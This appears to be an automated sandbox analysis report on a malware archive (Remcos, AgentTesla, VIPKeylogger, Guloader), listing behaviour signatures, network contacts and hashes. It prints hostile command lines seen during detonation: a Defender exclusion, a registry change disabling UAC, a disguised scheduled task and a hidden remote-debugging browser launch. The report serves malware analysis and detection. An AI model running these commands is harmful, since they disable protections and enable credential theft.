Analysis Overview
SHA256
9711e0f1f4b1ea97ecf7ddfe05b27c8f712533c2141f6e2b064d636076e76652
Threat Level: Known bad
The file malware-collection.zip was found to be: Known bad.
Malicious Activity Summary
Remcos
Vipkeylogger family
Remcos family
AgentTesla
Guloader family
UAC bypass
Guloader, Cloudeye
VIPKeylogger
Agenttesla family
Detected Nirsoft tools
NirSoft MailPassView
NirSoft WebBrowserPassView
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Executes dropped EXE
Checks computer location settings
Drops startup file
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Reads user/profile data of local email clients
Reads data files stored by FTP clients
Loads dropped DLL
Looks up external IP address via web service
Accesses Microsoft Outlook accounts
Legitimate hosting services abused for malware hosting/C2
Network Service Discovery
Accesses Microsoft Outlook profiles
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
System Network Configuration Discovery: Internet Connection Discovery
Scheduled Task/Job: Scheduled Task
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Modifies registry key
Runs ping.exe
outlook_office_path
outlook_win_path
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-06 02:10
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
145s
Max time network
151s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2028 set thread context of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\rollerskater.lnk | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| File opened for modification | C:\Program Files (x86)\rollerskater.lnk | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
| PID 2028 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | C:\Users\Admin\AppData\Local\Temp\Produccion.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Produccion.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Produccion.exe
"C:\Users\Admin\AppData\Local\Temp\Produccion.exe"
C:\Users\Admin\AppData\Local\Temp\Produccion.exe
"C:\Users\Admin\AppData\Local\Temp\Produccion.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 169.8.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsi6821.tmp\System.dll
| MD5 | ee260c45e97b62a5e42f17460d406068 |
| SHA1 | df35f6300a03c4d3d3bd69752574426296b78695 |
| SHA256 | e94a1f7bcd7e0d532b660d0af468eb3321536c3efdca265e61f9ec174b1aef27 |
| SHA512 | a98f350d17c9057f33e5847462a87d59cbf2aaeda7f6299b0d49bb455e484ce4660c12d2eb8c4a0d21df523e729222bbd6c820bf25b081bc7478152515b414b3 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
145s
Max time network
150s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2504 set thread context of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
| PID 2504 wrote to memory of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe | C:\Users\Admin\AppData\Local\Temp\103024_37663.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\103024_37663.exe
"C:\Users\Admin\AppData\Local\Temp\103024_37663.exe"
C:\Users\Admin\AppData\Local\Temp\103024_37663.exe
"C:\Users\Admin\AppData\Local\Temp\103024_37663.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kmsaksesuar.com | udp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
| US | 44.28.239.165:443 | kmsaksesuar.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\nssA569.tmp\System.dll
| MD5 | 8b3830b9dbf87f84ddd3b26645fed3a0 |
| SHA1 | 223bef1f19e644a610a0877d01eadc9e28299509 |
| SHA256 | f004c568d305cd95edbd704166fcd2849d395b595dff814bcc2012693527ac37 |
| SHA512 | d13cfd98db5ca8dc9c15723eee0e7454975078a776bce26247228be4603a0217e166058ebadc68090afe988862b7514cb8cb84de13b3de35737412a6f0a8ac03 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
98s
Max time network
139s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3088 set thread context of 4284 | N/A | C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr | C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr
"C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr" /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\zrjxKRHUf.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zrjxKRHUf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCFA4.tmp"
C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr
"C:\Users\Admin\AppData\Local\Temp\AWB #281024..scr"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.35.26:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\tmpCFA4.tmp
| MD5 | da65156b9bb01d72c2e305bf225da30d |
| SHA1 | 482559666fa0ae88b5e89e44766d09e6a3b0d606 |
| SHA256 | 48b7c1f6dcbc8c89427d902b1bc65dda7d940a2bb48e7b51a8b7c53f5d1a84e7 |
| SHA512 | 580bdde6db2cb9cb1b47d74469250fdf49c893993aa613bdcbff7e92e66a97579ad92a149875657241cd11ae4ffa0ca299e438c28d3beefe38dcbf682553cd14 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cxzwchln.jj3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
147s
Command Line
Signatures
Remcos
Remcos family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4800 set thread context of 4656 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4800 set thread context of 4944 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4800 set thread context of 1120 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EE85716273pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files\Google\Chrome\Application\Chrome.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x98,0x224,0x228,0x218,0x22c,0x7ffbc5e6cc40,0x7ffbc5e6cc4c,0x7ffbc5e6cc58
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2052,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1976 /prefetch:2
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1968,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2084 /prefetch:3
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1820,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2324 /prefetch:8
